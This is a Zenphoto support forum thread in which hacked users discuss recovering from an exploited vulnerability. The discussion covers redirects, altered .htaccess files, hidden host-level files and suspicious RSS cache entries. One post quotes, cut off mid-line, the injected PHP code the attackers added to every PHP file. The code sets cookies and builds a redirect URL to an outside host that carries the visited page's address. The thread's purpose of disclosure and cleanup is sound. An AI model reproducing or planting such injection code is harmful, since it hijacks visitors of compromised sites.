Ok great. I will give that a shot then!
I am enjoying Zenphoto thus far and thank you for your hard work on this. I am now following the RSS feed so I can get updates/security fixes faster (had I done that before I probably wouldn't be in this boat ).
I appear to also have been effected by this vulnerability. They had my Zenphoto domain redirecting to http://(hacker's URL).in/jaki/index.php as you can see below and also altered the .htaccess and php files for the other domains in my shared hosting the accounts. The latter changes seem to have had no noticeable effect (the rest of the sites run on Drupal 6 or 7).
Can anyone else who was hacked let me know if the hackers altered anything else on their systems that I should fix? I purged everything but the albums folder from my Zenphoto install and removed the added code from the *.php and .htaccess files on my other domains. Is there anything else I should do to set things right?
For reference, the hackers added this to the top of all PHP files:
`global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "document.cookie='".$sessdt_k."=".$sessdt_f."';"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo ""; echo "
Here are several insights to the hackes by a user:
http://www.zenphoto.org/support/topic.php?id=9951#post-58366
Also several of my website that use ZP were hacked, I have recovered 1 website, but I'm having troubles with another one, I have deleted all webfiles and when I visit the url, I keep being redirected, although the site is completely empty, also all htaccess were deleted. So my question is, what part keeps redirecting ??
puregraphx : I just finished recovery from one of my zengallery installs. If you're still experiencing a redirection, chances are there is a shell access only directory above your FTP (this is the case for godaddy and all of their resellers). If you are a godaddy user, you'll need to enable SSH and use port 22 to find the master htaccess file for your shared hosting account (which isn't visible if you're just using FTP on port 21, only SFTP on port 22). I hope this helps.
Can anyone answer if the cache files need to be cleared before or after the upgrade to prevent the same security hole from allowing unauthorized users in? - I've noticed a lot of very long rss cache files (example: rss_ampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampampamplang.xml)
Is this normal activity for zengallery?
I would recommend to clear all caches. Does not hurt as they are recreated on request anyway. It is unlikely that images contain hacked code but the cached html or rss files might do (not php but hacked links or js code).
No, such rss files are not normal, unless you have an album with that long name. Album rss feed files look like this:
rss_Screenshots_screenshots_en_US.xml
This is a cached feed of the screenshots subalbum of the Screenshots album (example from our own site). Language version is English which is the default and only one used on our site anyway.